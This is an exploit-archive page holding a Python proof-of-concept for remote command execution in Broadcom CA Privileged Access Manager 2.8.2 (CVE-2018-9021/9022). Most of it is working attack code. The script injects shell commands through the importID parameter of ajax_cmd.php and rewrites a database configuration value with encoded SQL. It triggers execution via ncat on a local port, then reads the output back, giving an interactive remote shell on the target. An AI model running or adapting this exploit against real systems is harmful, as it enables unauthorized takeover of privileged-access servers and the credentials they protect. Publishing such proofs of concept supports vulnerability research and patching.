Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution: Posted Dec 5, 2019; Authored by Peter Lapp; Broadcom CA Privileged Access Manager version 2.8.2 suffers from a remote command execution vulnerability.; tags | exploit, remote; advisories | CVE-2018-9021, CVE-2018-9022; SHA-256 | b57c9d05247aeec50f84b6f1d59466d0e7e19320e75ac48a4c045bb8ffba4b6b; Download | Favorite | View

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value
    
def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd
    
def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)
    
def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
  
    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'
  
    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)
  


if __name__ == "__main__":
    main()

Top Authors In Last 30 Days

Red Hat 240 files
indoushka 173 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,209)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,823)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,848)
UNIX (9,455)
UnixWare (188)
Windows (6,772)
Other

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

Share This

Broadcom CA Privileged Access Manager 2.8.2 Remote Command Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems